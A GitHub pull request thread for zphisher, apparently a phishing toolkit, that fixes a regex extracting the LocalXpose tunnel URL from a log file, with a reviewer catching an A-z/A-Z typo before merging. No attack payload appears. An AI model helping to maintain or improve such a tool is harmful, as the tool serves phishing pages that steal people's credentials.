### PR TITLE
regex fix

### PR DESCRIPTION
**Pull request by E343IO**
### check above imgs

### CODE REVIEW

File: zphisher.sh [hunk 1]
```diff
@@ -483,7 +483,7 @@ start_loclx() {
 	fi
 
 	{ sleep 12; clear; banner_small; }
-	loclx_url=$(cat .server/.loclx | grep -Eo '[-0-9a-z]+.[-0-9a-z]+(.loclx.io)') # Somebody fix this crappy regex :(
+	loclx_url=$(cat .server/.loclx | grep -o '[0-9a-zA-z.]*.loclx.io') #DONE :)
```
Comment (htr-tech) [inline zphisher.sh:486]: Just a Typo

change `A-z` to `A-Z` (For uppercase)

**Review by htr-tech — CHANGES_REQUESTED** [review]

**Comment by E343IO** [comment]
@htr-tech not just typos all alpha(upper and lower case)-numeric with 
**' . '** that for region. 
[0-9] numeric
[a-z] lower case alpha
[A-Z] upper case alpha 
[.] Additional for url that terms region eg : 
**eu**, **us** 
some-regex-text-combination.eu.loclx.io
Same for us region.
As you are using 2 region also this can be done 
: [0-9a-z]*.${REGION}.loclx.io

**Comment by htr-tech** [comment]
@E343IO I got that upper and lower case + numeric regex

[A-Z] is used for uppercase..But you have typed [**A-z**] in [#L486](https://github.com/htr-tech/zphisher/blob/a02e80547554b566c8b1439498d633d0ad1b42ab/zphisher.sh#L486)
image

## won't it be `[0-9a-zA-Z.]*.loclx.io` ? [ last **z** in capital ]
### instead of `[0-9a-zA-z.]*.loclx.io` (Also it is throwing me error on Debian (bullseye)

image

**Review by htr-tech — APPROVED** [review]

**Comment by E343IO** [comment]
> @E343IO I got that upper and lower case + numeric regex
> 
> [A-Z] is used for uppercase..But you have typed [**A-z**] in [#L486](https://github.com/htr-tech/zphisher/blob/a02e80547554b566c8b1439498d633d0ad1b42ab/zphisher.sh#L486) image (last z in lowercase)
> 
> ## won't it be `[0-9a-zA-Z.]*.loclx.io` ? [ last **z** in capital ]
> ### instead of `[0-9a-zA-z.]*.loclx.io` (Also it is throwing me error on Debian (bullseye)
> image

@htr-tech i appreciate its my fault i didn't see that becoz my device is to choopy i did within a second to doing thing fast it gone wrong 😅

**Comment by htr-tech** [comment]
> @htr-tech i appreciate its my fault i didn't see that becoz my device is to choopy i did within a second to doing thing fast it gone wrong 😅

No Problem.. I was struggling with this regex . Thanks for The PR ❤️

**Pull request merged**